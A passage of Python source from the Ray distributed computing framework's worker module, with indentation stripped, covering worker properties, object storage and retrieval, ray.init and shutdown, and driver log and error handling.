return self._load_code_from_local
@property
def current_job_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_current_job_id()
return JobID.nil()
@property
def actor_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_actor_id()
return ActorID.nil()
@property
def current_task_id(self):
return self.core_worker.get_current_task_id()
@property
def current_node_id(self):
return self.core_worker.get_current_node_id()
@property
def namespace(self):
return self.core_worker.get_job_config().ray_namespace
@property
def placement_group_id(self):
return self.core_worker.get_placement_group_id()
@property
def worker_id(self):
return self.core_worker.get_worker_id().binary()
@property
def should_capture_child_tasks_in_placement_group(self):
return self.core_worker.should_capture_child_tasks_in_placement_group()
@property
def current_session_and_job(self):
"""Get the current session index and job id as pair."""
assert isinstance(self._session_index, int)
assert isinstance(self.current_job_id, ray.JobID)
return self._session_index, self.current_job_id
@property
def runtime_env(self):
"""Get the runtime env in json format"""
return json.loads(self.core_worker.get_job_config()
.runtime_env.serialized_runtime_env)
def get_serialization_context(self, job_id=None):
"""Get the SerializationContext of the job that this worker is processing.
Args:
job_id: The ID of the job that indicates which job to get
the serialization context for.
Returns:
The serialization context of the given job.
"""
# This function needs to be protected by a lock, because it will be
# called by`register_class_for_serialization`, as well as the import
# thread, from different threads. Also, this function will recursively
# call itself, so we use RLock here.
if job_id is None:
job_id = self.current_job_id
with self.lock:
if job_id not in self.serialization_context_map:
self.serialization_context_map[
job_id] = serialization.SerializationContext(self)
return self.serialization_context_map[job_id]
def check_connected(self):
"""Check if the worker is connected.
Raises:
Exception: An exception is raised if the worker is not connected.
"""
if not self.connected:
raise RaySystemError("Ray has not been started yet. You can "
"start Ray with 'ray.init()'.")
def set_mode(self, mode):
"""Set the mode of the worker.
The mode SCRIPT_MODE should be used if this Worker is a driver that is
being run as a Python script or interactively in a shell. It will print
information about task failures.
The mode WORKER_MODE should be used if this Worker is not a driver. It
will not print information about tasks.
The mode LOCAL_MODE should be used if this Worker is a driver and if
you want to run the driver in a manner equivalent to serial Python for
debugging purposes. It will not send remote function calls to the
scheduler and will instead execute them in a blocking fashion.
Args:
mode: One of SCRIPT_MODE, WORKER_MODE, and LOCAL_MODE.
"""
self.mode = mode
def set_load_code_from_local(self, load_code_from_local):
self._load_code_from_local = load_code_from_local
def put_object(self, value, object_ref=None, owner_address=None):
"""Put value in the local object store with object reference `object_ref`.
This assumes that the value for `object_ref` has not yet been placed in
the local object store. If the plasma store is full, the worker will
automatically retry up to DEFAULT_PUT_OBJECT_RETRIES times. Each
retry will delay for an exponentially doubling amount of time,
starting with DEFAULT_PUT_OBJECT_DELAY. After this, exception
will be raised.
Args:
value: The value to put in the object store.
object_ref (ObjectRef): The object ref of the value to be
put. If None, one will be generated.
owner_address: The serialized address of object's owner.
Returns:
ObjectRef: The object ref the object was put under.
Raises:
ray.exceptions.ObjectStoreFullError: This is raised if the attempt
to store the object fails because the object store is full even
after multiple retries.
"""
# Make sure that the value is not an object ref.
if isinstance(value, ObjectRef):
raise TypeError(
"Calling 'put' on an ray.ObjectRef is not allowed "
"(similarly, returning an ray.ObjectRef from a remote "
"function is not allowed). If you really want to "
"do this, you can wrap the ray.ObjectRef in a list and "
"call 'put' on it (or return it).")
if self.mode == LOCAL_MODE:
assert object_ref is None, ("Local Mode does not support "
"inserting with an ObjectRef")
serialized_value = self.get_serialization_context().serialize(value)
# This *must* be the first place that we construct this python
# ObjectRef because an entry with 0 local references is created when
# the object is Put() in the core worker, expecting that this python
# reference will be created. If another reference is created and
# removed before this one, it will corrupt the state in the
# reference counter.
return ray.ObjectRef(
self.core_worker.put_serialized_object(
serialized_value,
object_ref=object_ref,
owner_address=owner_address))
def raise_errors(self, data_metadata_pairs, object_refs):
out = self.deserialize_objects(data_metadata_pairs, object_refs)
if "RAY_IGNORE_UNHANDLED_ERRORS" in os.environ:
return
for e in out:
_unhandled_error_handler(e)
def deserialize_objects(self, data_metadata_pairs, object_refs):
# Function actor manager or the import thread may call pickle.loads
# at the same time which can lead to failed imports
# TODO: We may be better off locking on all imports or injecting a lock
# into pickle.loads (https://github.com/ray-project/ray/issues/16304)
with self.function_actor_manager.lock:
context = self.get_serialization_context()
return context.deserialize_objects(data_metadata_pairs,
object_refs)
def get_objects(self, object_refs, timeout=None):
"""Get the values in the object store associated with the IDs.
Return the values from the local object store for object_refs. This
will block until all the values for object_refs have been written to
the local object store.
Args:
object_refs (List[object_ref.ObjectRef]): A list of the object refs
whose values should be retrieved.
timeout (float): timeout (float): The maximum amount of time in
seconds to wait before returning.
Returns:
list: List of deserialized objects
bytes: UUID of the debugger breakpoint we should drop
into or b"" if there is no breakpoint.
"""
# Make sure that the values are object refs.
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError(
f"Attempting to call `get` on the value {object_ref}, "
"which is not an ray.ObjectRef.")
timeout_ms = int(timeout * 1000) if timeout else -1
data_metadata_pairs = self.core_worker.get_objects(
object_refs, self.current_task_id, timeout_ms)
debugger_breakpoint = b""
for (data, metadata) in data_metadata_pairs:
if metadata:
metadata_fields = metadata.split(b",")
if len(metadata_fields) >= 2 and metadata_fields[1].startswith(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):
debugger_breakpoint = metadata_fields[1][len(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):]
return self.deserialize_objects(data_metadata_pairs,
object_refs), debugger_breakpoint
def run_function_on_all_workers(self, function,
run_on_other_drivers=False):
"""Run arbitrary code on all of the workers.
This function will first be run on the driver, and then it will be
exported to all of the workers to be run. It will also be run on any
new workers that register later. If ray.init has not been called yet,
then cache the function and export it later.
Args:
function (Callable): The function to run on all of the workers. It
takes only one argument, a worker info dict. If it returns
anything, its return values will not be used.
run_on_other_drivers: The boolean that indicates whether we want to
run this function on other drivers. One case is we may need to
share objects across drivers.
"""
# If ray.init has not been called yet, then cache the function and
# export it when connect is called. Otherwise, run the function on all
# workers.
if self.mode is None:
self.cached_functions_to_run.append(function)
else:
# Attempt to pickle the function before we need it. This could
# fail, and it is more convenient if the failure happens before we
# actually run the function locally.
pickled_function = pickle.dumps(function)
function_to_run_id = hashlib.shake_128(pickled_function).digest(
ray_constants.ID_SIZE)
key = b"FunctionsToRun:" + function_to_run_id
# First run the function on the driver.
# We always run the task locally.
function({"worker": self})
# Check if the function has already been put into redis.
function_exported = self.redis_client.setnx(b"Lock:" + key, 1)
if not function_exported:
# In this case, the function has already been exported, so
# we don't need to export it again.
return
check_oversized_function(pickled_function, function.__name__,
"function", self)
# Run the function on all workers.
self.redis_client.hset(
key,
mapping={
"job_id": self.current_job_id.binary(),
"function_id": function_to_run_id,
"function": pickled_function,
"run_on_other_drivers": str(run_on_other_drivers),
})
self.redis_client.rpush("Exports", key)
# TODO(rkn): If the worker fails after it calls setnx and before it
# successfully completes the hset and rpush, then the program will
# most likely hang. This could be fixed by making these three
# operations into a transaction (or by implementing a custom
# command that does all three things).
def main_loop(self):
"""The main loop a worker runs to receive and execute tasks."""
def sigterm_handler(signum, frame):
shutdown(True)
sys.exit(1)
ray._private.utils.set_sigterm_handler(sigterm_handler)
self.core_worker.run_task_loop()
sys.exit(0)
def print_logs(self):
"""Prints log messages from workers on all nodes in the same job.
"""
pubsub_client = self.redis_client.pubsub(
ignore_subscribe_messages=True)
pubsub_client.subscribe(gcs_utils.LOG_FILE_CHANNEL)
localhost = services.get_node_ip_address()
try:
# Keep track of the number of consecutive log messages that have
# been received with no break in between. If this number grows
# continually, then the worker is probably not able to process the
# log messages as rapidly as they are coming in.
num_consecutive_messages_received = 0
job_id_binary = ray._private.utils.binary_to_hex(
self.current_job_id.binary())
while True:
# Exit if we received a signal that we should stop.
if self.threads_stopped.is_set():
return
msg = pubsub_client.get_message()
if msg is None:
num_consecutive_messages_received = 0
self.threads_stopped.wait(timeout=0.01)
continue
num_consecutive_messages_received += 1
if (num_consecutive_messages_received % 100 == 0
and num_consecutive_messages_received > 0):
logger.warning(
"The driver may not be able to keep up with the "
"stdout/stderr of the workers. To avoid forwarding "
"logs to the driver, use "
"'ray.init(log_to_driver=False)'.")
data = json.loads(ray._private.utils.decode(msg["data"]))
# Don't show logs from other drivers.
if (self.filter_logs_by_job and data["job"]
and job_id_binary != data["job"]):
continue
data["localhost"] = localhost
global_worker_stdstream_dispatcher.emit(data)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"print_logs: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
pubsub_client.close()
@PublicAPI
@client_mode_hook(auto_init=True)
def get_gpu_ids():
"""Get the IDs of the GPUs that are available to the worker.
If the CUDA_VISIBLE_DEVICES environment variable was set when the worker
started up, then the IDs returned by this method will be a subset of the
IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range
[0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has.
Returns:
A list of GPU IDs.
"""
worker = global_worker
worker.check_connected()
if worker.mode != WORKER_MODE:
if log_once("worker_get_gpu_ids_empty_from_driver"):
logger.warning(
"`ray.get_gpu_ids()` will always return the empty list when "
"called from the driver. This is because Ray does not manage "
"GPU allocations to the driver process.")
# TODO(ilr) Handle inserting resources in local mode
all_resource_ids = global_worker.core_worker.resource_ids()
assigned_ids = set()
for resource, assignment in all_resource_ids.items():
# Handle both normal and placement group GPU resources.
# Note: We should only get the GPU ids from the placement
# group resource that does not contain the bundle index!
import re
if resource == "GPU" or re.match(r"^GPU_group_[0-9A-Za-z]+$",
resource):
for resource_id, _ in assignment:
assigned_ids.add(resource_id)
assigned_ids = list(assigned_ids)
# If the user had already set CUDA_VISIBLE_DEVICES, then respect that (in
# the sense that only GPU IDs that appear in CUDA_VISIBLE_DEVICES should be
# returned).
if global_worker.original_gpu_ids is not None:
assigned_ids = [
global_worker.original_gpu_ids[gpu_id] for gpu_id in assigned_ids
]
# Give all GPUs in local_mode.
if global_worker.mode == LOCAL_MODE:
max_gpus = global_worker.node.get_resource_spec().num_gpus
assigned_ids = global_worker.original_gpu_ids[:max_gpus]
return assigned_ids
@Deprecated
def get_resource_ids():
"""Get the IDs of the resources that are available to the worker.
Returns:
A dictionary mapping the name of a resource to a list of pairs, where
each pair consists of the ID of a resource and the fraction of that
resource reserved for this worker.
"""
worker = global_worker
worker.check_connected()
if _mode() == LOCAL_MODE:
raise RuntimeError(
"ray.worker.get_resource_ids() currently does not work in "
"local_mode.")
return global_worker.core_worker.resource_ids()
@Deprecated
def get_dashboard_url():
"""Get the URL to access the Ray dashboard.
Note that the URL does not specify which node the dashboard is on.
Returns:
The URL of the dashboard as a string.
"""
worker = global_worker
worker.check_connected()
return _global_node.webui_url
global_worker = Worker()
"""Worker: The global Worker object for this worker process.
We use a global Worker object to ensure that there is a single worker object
per worker process.
"""
_global_node = None
"""ray.node.Node: The global node object that is created by ray.init()."""
@PublicAPI
@client_mode_hook(auto_init=False)
def init(
address: Optional[str] = None,
*,
num_cpus: Optional[int] = None,
num_gpus: Optional[int] = None,
resources: Optional[Dict[str, float]] = None,
object_store_memory: Optional[int] = None,
local_mode: bool = False,
ignore_reinit_error: bool = False,
include_dashboard: Optional[bool] = None,
dashboard_host: str = ray_constants.DEFAULT_DASHBOARD_IP,
dashboard_port: Optional[int] = None,
job_config: "ray.job_config.JobConfig" = None,
configure_logging: bool = True,
logging_level: int = logging.INFO,
logging_format: str = ray_constants.LOGGER_FORMAT,
log_to_driver: bool = True,
namespace: Optional[str] = None,
runtime_env: Dict[str, Any] = None,
# The following are unstable parameters and their use is discouraged.
_enable_object_reconstruction: bool = False,
_redis_max_memory: Optional[int] = None,
_plasma_directory: Optional[str] = None,
_node_ip_address: str = ray_constants.NODE_DEFAULT_IP,
_driver_object_store_memory: Optional[int] = None,
_memory: Optional[int] = None,
_redis_password: str = ray_constants.REDIS_DEFAULT_PASSWORD,
_temp_dir: Optional[str] = None,
_lru_evict: bool = False,
_metrics_export_port: Optional[int] = None,
_system_config: Optional[Dict[str, str]] = None,
_tracing_startup_hook: Optional[Callable] = None,
**kwargs):
"""
Connect to an existing Ray cluster or start one and connect to it.
This method handles two cases; either a Ray cluster already exists and we
just attach this driver to it or we start all of the processes associated
with a Ray cluster and attach to the newly started cluster.
To start Ray locally and all of the relevant processes, use this as
follows:
.. code-block:: python
ray.init()
To connect to an existing local cluster, use this as follows (substituting
in the appropriate port if needed).
.. code-block:: python
ray.init(address="localhost:6379")
To connect to an existing remote cluster, use this as follows (substituting
in the appropriate address). Note the addition of "ray://" at the beginning
of the address.
.. code-block:: python
ray.init(address="ray://123.45.67.89:10001")
More details for starting and connecting to a remote cluster can be found
here: https://docs.ray.io/en/master/cluster/ray-client.html
You can also define an environment variable called `RAY_ADDRESS` in
the same format as the `address` parameter to connect to an existing
cluster with ray.init() or ray.init(address="auto").
Args:
address (str): The address of the Ray cluster to connect to. If
this address is not provided, then this command will start Redis,
a raylet, a plasma store, a plasma manager, and some workers.
It will also kill these processes when Python exits. If the driver
is running on a node in a Ray cluster, using `auto` as the value
tells the driver to detect the cluster, removing the need to
specify a specific node address. If the environment variable
`RAY_ADDRESS` is defined and the address is None or "auto", Ray
will set `address` to `RAY_ADDRESS`.
Addresses can be prefixed with a "ray://" to connect to a remote
cluster. For example, passing in the address
"ray://123.45.67.89:50005" will connect to the cluster at the
given address.
num_cpus (int): Number of CPUs the user wishes to assign to each
raylet. By default, this is set based on virtual cores.
num_gpus (int): Number of GPUs the user wishes to assign to each
raylet. By default, this is set based on detected GPUs.
resources: A dictionary mapping the names of custom resources to the
quantities for them available.
object_store_memory: The amount of memory (in bytes) to start the
object store with. By default, this is automatically set based on
available system memory.
local_mode (bool): If true, the code will be executed serially. This
is useful for debugging.
ignore_reinit_error: If true, Ray suppresses errors from calling
ray.init() a second time. Ray won't be restarted.
include_dashboard: Boolean flag indicating whether or not to start the
Ray dashboard, which displays the status of the Ray
cluster. If this argument is None, then the UI will be started if
the relevant dependencies are present.
dashboard_host: The host to bind the dashboard server to. Can either be
localhost (127.0.0.1) or 0.0.0.0 (available from all interfaces).
By default, this is set to localhost to prevent access from
external machines.
dashboard_port(int, None): The port to bind the dashboard server to.
Defaults to 8265 and Ray will automatically find a free port if
8265 is not available.
job_config (ray.job_config.JobConfig): The job configuration.
configure_logging: True (default) if configuration of logging is
allowed here. Otherwise, the user may want to configure it
separately.
logging_level: Logging level, defaults to logging.INFO. Ignored unless
"configure_logging" is true.
logging_format: Logging format, defaults to string containing a
timestamp, filename, line number, and message. See the source file
ray_constants.py for details. Ignored unless "configure_logging"
is true.
log_to_driver (bool): If true, the output from all of the worker
processes on all nodes will be directed to the driver.
namespace (str): Namespace to use
runtime_env (dict): The runtime environment to use for this job (see
:ref:`runtime-environments` for details). This API is in beta
and may change before becoming stable.
_enable_object_reconstruction (bool): If True, when an object stored in
the distributed plasma store is lost due to node failure, Ray will
attempt to reconstruct the object by re-executing the task that
created the object. Arguments to the task will be recursively
reconstructed. If False, then ray.ObjectLostError will be
thrown.
_redis_max_memory: Redis max memory.
_plasma_directory: Override the plasma mmap file directory.
_node_ip_address (str): The IP address of the node that we are on.
_driver_object_store_memory (int): Deprecated.
_memory: Amount of reservable memory resource to create.
_redis_password (str): Prevents external clients without the password
from connecting to Redis if provided.
_temp_dir (str): If provided, specifies the root temporary
directory for the Ray process. Defaults to an OS-specific
conventional location, e.g., "/tmp/ray".
_metrics_export_port(int): Port number Ray exposes system metrics
through a Prometheus endpoint. It is currently under active
development, and the API is subject to change.
_system_config (dict): Configuration for overriding
RayConfig defaults. For testing purposes ONLY.
_tracing_startup_hook (str): If provided, turns on and sets up tracing
for Ray. Must be the name of a function that takes no arguments and
sets up a Tracer Provider, Remote Span Processors, and
(optional) additional instruments. See more at
docs.ray.io/tracing.html. It is currently under active development,
and the API is subject to change.
Returns:
If the provided address includes a protocol, for example by prepending
"ray://" to the address to get "ray://1.2.3.4:10001", then a
ClientContext is returned with information such as settings, server
versions for ray and python, and the dashboard_url. Otherwise,
returns address information about the started processes.
Raises:
Exception: An exception is raised if an inappropriate combination of
arguments is passed in.
"""
# If available, use RAY_ADDRESS to override if the address was left
# unspecified, or set to "auto" in the call to init
address_env_var = os.environ.get(
ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE)
if address_env_var:
if address is None or address == "auto":
address = address_env_var
logger.info(
f"Using address {address_env_var} set in the environment "
f"variable {ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE}")
if address is not None and "://" in address:
# Address specified a protocol, use ray client
builder = ray.client(address)
# Forward any keyword arguments that were changed from their default
# values to the builder
init_sig = inspect.signature(init)
passed_kwargs = {}
for argument_name, param_obj in init_sig.parameters.items():
if argument_name in {"kwargs", "address"}:
# kwargs and address are handled separately
continue
default_value = param_obj.default
passed_value = locals()[argument_name]
if passed_value != default_value:
# passed value is different than default, pass to the client
# builder
passed_kwargs[argument_name] = passed_value
passed_kwargs.update(kwargs)
builder._init_args(**passed_kwargs)
return builder.connect()
if kwargs:
# User passed in extra keyword arguments but isn't connecting through
# ray client. Raise an error, since most likely a typo in keyword
unknown = ", ".join(kwargs)
raise RuntimeError(f"Unknown keyword argument(s): {unknown}")
# Try to increase the file descriptor limit, which is too low by
# default for Ray: https://github.com/ray-project/ray/issues/11239
try:
import resource
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < hard:
# https://github.com/ray-project/ray/issues/12059
soft = max(soft, min(hard, 65536))
logger.debug("Automatically increasing RLIMIT_NOFILE to max "
"value of {}".format(hard))
try:
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
except ValueError:
logger.debug("Failed to raise limit.")
soft, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < 4096:
logger.warning(
"File descriptor limit {} is too low for production "
"servers and may result in connection errors. "
"At least 8192 is recommended. --- "
"Fix with 'ulimit -n 8192'".format(soft))
except ImportError:
logger.debug("Could not import resource module (on Windows)")
pass
if runtime_env:
if job_config is None:
job_config = ray.job_config.JobConfig()
job_config.set_runtime_env(runtime_env)
# Convert hostnames to numerical IP address.
if _node_ip_address is not None:
node_ip_address = services.address_to_ip(_node_ip_address)
raylet_ip_address = node_ip_address
if address:
redis_address, _, _ = services.validate_redis_address(address)
else:
redis_address = None
if configure_logging:
setup_logger(logging_level, logging_format)
if redis_address is not None:
logger.info(
f"Connecting to existing Ray cluster at address: {redis_address}")
if local_mode:
driver_mode = LOCAL_MODE
else:
driver_mode = SCRIPT_MODE
if global_worker.connected:
if ignore_reinit_error:
logger.info(
"Calling ray.init() again after it has already been called.")
return
else:
raise RuntimeError("Maybe you called ray.init twice by accident? "
"This error can be suppressed by passing in "
"'ignore_reinit_error=True' or by calling "
"'ray.shutdown()' prior to 'ray.init()'.")
_system_config = _system_config or {}
if not isinstance(_system_config, dict):
raise TypeError("The _system_config must be a dict.")
global _global_node
if redis_address is None:
# In this case, we need to start a new cluster.
ray_params = ray._private.parameter.RayParams(
redis_address=redis_address,
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
object_ref_seed=None,
driver_mode=driver_mode,
redirect_worker_output=None,
redirect_output=None,
num_cpus=num_cpus,
num_gpus=num_gpus,
resources=resources,
num_redis_shards=None,
redis_max_clients=None,
redis_password=_redis_password,
plasma_directory=_plasma_directory,
huge_pages=None,
include_dashboard=include_dashboard,
dashboard_host=dashboard_host,
dashboard_port=dashboard_port,
memory=_memory,
object_store_memory=object_store_memory,
redis_max_memory=_redis_max_memory,
plasma_store_socket_name=None,
temp_dir=_temp_dir,
# We need to disable it if runtime env is not set.
# Uploading happens after core worker is created. And we should
# prevent default worker being created before uploading.
# TODO (yic): Have a separate connection to gcs client when
# removal redis is done. The uploading should happen before this
# one.
start_initial_python_workers_for_first_job=(
job_config is None or job_config.runtime_env is None),
_system_config=_system_config,
lru_evict=_lru_evict,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port,
tracing_startup_hook=_tracing_startup_hook)
# Start the Ray processes. We set shutdown_at_exit=False because we
# shutdown the node in the ray.shutdown call that happens in the atexit
# handler. We still spawn a reaper process in case the atexit handler
# isn't called.
_global_node = ray.node.Node(
head=True,
shutdown_at_exit=False,
spawn_reaper=True,
ray_params=ray_params)
else:
# In this case, we are connecting to an existing cluster.
if num_cpus is not None or num_gpus is not None:
raise ValueError(
"When connecting to an existing cluster, num_cpus "
"and num_gpus must not be provided.")
if resources is not None:
raise ValueError("When connecting to an existing cluster, "
"resources must not be provided.")
if object_store_memory is not None:
raise ValueError("When connecting to an existing cluster, "
"object_store_memory must not be provided.")
if _system_config is not None and len(_system_config) != 0:
raise ValueError("When connecting to an existing cluster, "
"_system_config must not be provided.")
if _enable_object_reconstruction:
raise ValueError(
"When connecting to an existing cluster, "
"_enable_object_reconstruction must not be provided.")
# In this case, we only need to connect the node.
ray_params = ray._private.parameter.RayParams(
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
redis_address=redis_address,
redis_password=_redis_password,
object_ref_seed=None,
temp_dir=_temp_dir,
_system_config=_system_config,
lru_evict=_lru_evict,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port)
_global_node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True)
if driver_mode == SCRIPT_MODE and job_config:
# Rewrite the URI. Note the package isn't uploaded to the URI until
# later in the connect.
working_dir_pkg.rewrite_runtime_env_uris(job_config)
connect(
_global_node,
mode=driver_mode,
log_to_driver=log_to_driver,
worker=global_worker,
driver_object_store_memory=_driver_object_store_memory,
job_id=None,
namespace=namespace,
job_config=job_config)
if job_config and job_config.code_search_path:
global_worker.set_load_code_from_local(True)
else:
# Because `ray.shutdown()` doesn't reset this flag, for multiple
# sessions in one process, the 2nd `ray.init()` will reuse the
# flag of last session. For example:
# ray.init(load_code_from_local=True)
# ray.shutdown()
# ray.init()
# # Here the flag `load_code_from_local` is still True if we
# # doesn't have this `else` branch.
# ray.shutdown()
global_worker.set_load_code_from_local(False)
for hook in _post_init_hooks:
hook()
node_id = global_worker.core_worker.get_current_node_id()
return dict(_global_node.address_info, node_id=node_id.hex())
# Functions to run as callback after a successful ray init.
_post_init_hooks = []
@PublicAPI
@client_mode_hook(auto_init=False)
def shutdown(_exiting_interpreter: bool = False):
"""Disconnect the worker, and terminate processes started by ray.init().
This will automatically run at the end when a Python process that uses Ray
exits. It is ok to run this twice in a row. The primary use case for this
function is to cleanup state between tests.
Note that this will clear any remote function definitions, actor
definitions, and existing actors, so if you wish to use any previously
defined remote functions or actors after calling ray.shutdown(), then you
need to redefine them. If they were defined in an imported module, then you
will need to reload the module.
Args:
_exiting_interpreter (bool): True if this is called by the atexit hook
and false otherwise. If we are exiting the interpreter, we will
wait a little while to print any extra error messages.
"""
if _exiting_interpreter and global_worker.mode == SCRIPT_MODE:
# This is a duration to sleep before shutting down everything in order
# to make sure that log messages finish printing.
time.sleep(0.5)
disconnect(_exiting_interpreter)
# We need to destruct the core worker here because after this function,
# we will tear down any processes spawned by ray.init() and the background
# IO thread in the core worker doesn't currently handle that gracefully.
if hasattr(global_worker, "gcs_client"):
del global_worker.gcs_client
if hasattr(global_worker, "core_worker"):
global_worker.core_worker.shutdown()
del global_worker.core_worker
# Disconnect global state from GCS.
ray.state.state.disconnect()
# Shut down the Ray processes.
global _global_node
if _global_node is not None:
if _global_node.is_head():
_global_node.destroy_external_storage()
_global_node.kill_all_processes(check_alive=False, allow_graceful=True)
_global_node = None
# TODO(rkn): Instead of manually resetting some of the worker fields, we
# should simply set "global_worker" to equal "None" or something like that.
global_worker.set_mode(None)
atexit.register(shutdown, True)
# TODO(edoakes): this should only be set in the driver.
def sigterm_handler(signum, frame):
sys.exit(signum)
try:
ray._private.utils.set_sigterm_handler(sigterm_handler)
except ValueError:
logger.warning("Failed to set SIGTERM handler, processes might"
"not be cleaned up properly on exit.")
# Define a custom excepthook so that if the driver exits with an exception, we
# can push that exception to Redis.
normal_excepthook = sys.excepthook
def custom_excepthook(type, value, tb):
# If this is a driver, push the exception to GCS worker table.
if global_worker.mode == SCRIPT_MODE and hasattr(global_worker,
"worker_id"):
error_message = "".join(traceback.format_tb(tb))
worker_id = global_worker.worker_id
worker_type = gcs_utils.DRIVER
worker_info = {"exception": error_message}
ray.state.state._check_connected()
ray.state.state.add_worker(worker_id, worker_type, worker_info)
# Call the normal excepthook.
normal_excepthook(type, value, tb)
sys.excepthook = custom_excepthook
def print_to_stdstream(data):
print_file = sys.stderr if data["is_err"] else sys.stdout
print_worker_logs(data, print_file)
# Start time of this process, used for relative time logs.
t0 = time.time()
autoscaler_log_fyi_printed = False
def filter_autoscaler_events(lines: List[str]) -> Iterator[str]:
"""Given raw log lines from the monitor, return only autoscaler events.
Autoscaler events are denoted by the ":event_summary:" magic token.
"""
global autoscaler_log_fyi_printed
if not AUTOSCALER_EVENTS:
return
# Print out autoscaler events only, ignoring other messages.
for line in lines:
if ray_constants.LOG_PREFIX_EVENT_SUMMARY in line:
if not autoscaler_log_fyi_printed:
yield ("Tip: use `ray status` to view detailed "
"cluster status. To disable these "
"messages, set RAY_SCHEDULER_EVENTS=0.")
autoscaler_log_fyi_printed = True
# The event text immediately follows the ":event_summary:"
# magic token.
yield line.split(ray_constants.LOG_PREFIX_EVENT_SUMMARY)[1]
def time_string() -> str:
"""Return the relative time from the start of this job.
For example, 15m30s.
"""
delta = time.time() - t0
hours = 0
minutes = 0
while delta > 3600:
hours += 1
delta -= 3600
while delta > 60:
minutes += 1
delta -= 60
output = ""
if hours:
output += "{}h".format(hours)
if minutes:
output += "{}m".format(minutes)
output += "{}s".format(int(delta))
return output
# When we enter a breakpoint, worker logs are automatically disabled via this.
_worker_logs_enabled = True
def print_worker_logs(data: Dict[str, str], print_file: Any):
if not _worker_logs_enabled:
return
def prefix_for(data: Dict[str, str]) -> str:
"""The PID prefix for this log line."""
if data.get("pid") in ["autoscaler", "raylet"]:
return ""
else:
res = "pid="
if data.get("actor_name"):
res = data["actor_name"] + " " + res
elif data.get("task_name"):
res = data["task_name"] + " " + res
return res
def color_for(data: Dict[str, str], line: str) -> str:
"""The color for this log line."""
if data.get("pid") == "raylet":
return colorama.Fore.YELLOW
elif data.get("pid") == "autoscaler":
if "Error:" in line or "Warning:" in line:
return colorama.Style.BRIGHT + colorama.Fore.YELLOW
else:
return colorama.Style.BRIGHT + colorama.Fore.CYAN
else:
return colorama.Fore.CYAN
if data.get("pid") == "autoscaler":
pid = "scheduler +{}".format(time_string())
lines = filter_autoscaler_events(data.get("lines", []))
else:
pid = data.get("pid")
lines = data.get("lines", [])
if data.get("ip") == data.get("localhost"):
for line in lines:
print(
"{}{}({}{}){} {}".format(colorama.Style.DIM,
color_for(data,
line), prefix_for(data),
pid, colorama.Style.RESET_ALL, line),
file=print_file)
else:
for line in lines:
print(
"{}{}({}{}, ip={}){} {}".format(colorama.Style.DIM,
color_for(data, line),
prefix_for(data), pid,
data.get("ip"),
colorama.Style.RESET_ALL,
line),
file=print_file)
def listen_error_messages_raylet(worker, threads_stopped):
"""Listen to error messages in the background on the driver.
This runs in a separate thread on the driver and pushes (error, time)
tuples to the output queue.
Args:
worker: The worker class that this thread belongs to.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
"""
worker.error_message_pubsub_client = worker.redis_client.pubsub(
ignore_subscribe_messages=True)
# Exports that are published after the call to
# error_message_pubsub_client.subscribe and before the call to
# error_message_pubsub_client.listen will still be processed in the loop.
# Really we should just subscribe to the errors for this specific job.
# However, currently all errors seem to be published on the same channel.
error_pubsub_channel = gcs_utils.RAY_ERROR_PUBSUB_PATTERN
worker.error_message_pubsub_client.psubscribe(error_pubsub_channel)
try:
if _internal_kv_initialized():
# Get any autoscaler errors that occurred before the call to
# subscribe.
error_message = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
if error_message is not None:
logger.warning(error_message.decode())
while True:
# Exit if we received a signal that we should stop.
if threads_stopped.is_set():
return
msg = worker.error_message_pubsub_client.get_message()
if msg is None:
threads_stopped.wait(timeout=0.01)
continue
pubsub_msg = gcs_utils.PubSubMessage.FromString(msg["data"])
error_data = gcs_utils.ErrorTableData.FromString(pubsub_msg.data)
job_id = error_data.job_id
if job_id not in [
worker.current_job_id.binary(),
JobID.nil().binary(),
]:
continue
error_message = error_data.error_message
if (error_data.type == ray_constants.TASK_PUSH_ERROR):
# TODO(ekl) remove task push errors entirely now that we have
# the separate unhandled exception handler.
pass
else:
logger.warning(error_message)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"listen_error_messages_raylet: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
worker.error_message_pubsub_client.close()
@PublicAPI
@client_mode_hook(auto_init=False)
def is_initialized() -> bool:
"""Check if ray.init has been called yet.
Returns:
True if ray.init has already been called and false otherwise.
"""
return ray.worker.global_worker.connected
def connect(node,
mode=WORKER_MODE,
log_to_driver=False,
worker=global_worker,
driver_object_store_memory=None,
job_id=None,
namespace=None,
job_config=None,
runtime_env_hash=0,
worker_shim_pid=0,
ray_debugger_external=False):
"""Connect this worker to the raylet, to Plasma, and to Redis.
Args:
node (ray.node.Node): The node to connect.
mode: The mode of the worker. One of SCRIPT_MODE, WORKER_MODE, and
LOCAL_MODE.
log_to_driver (bool): If true, then output from all of the worker
processes on all nodes will be directed to the driver.
worker: The ray.Worker instance.
driver_object_store_memory: Deprecated.
job_id: The ID of job. If it's None, then we will generate one.
job_config (ray.job_config.JobConfig): The job configuration.
runtime_env_hash (int): The hash of the runtime env for this worker.
worker_shim_pid (int): The PID of the process for setup worker
runtime env.
ray_debugger_host (bool): The host to bind a Ray debugger to on
this worker.
"""
# Do some basic checking to make sure we didn't call ray.init twice.
error_message = "Perhaps you called ray.init twice by accident?"
assert not worker.connected, error_message
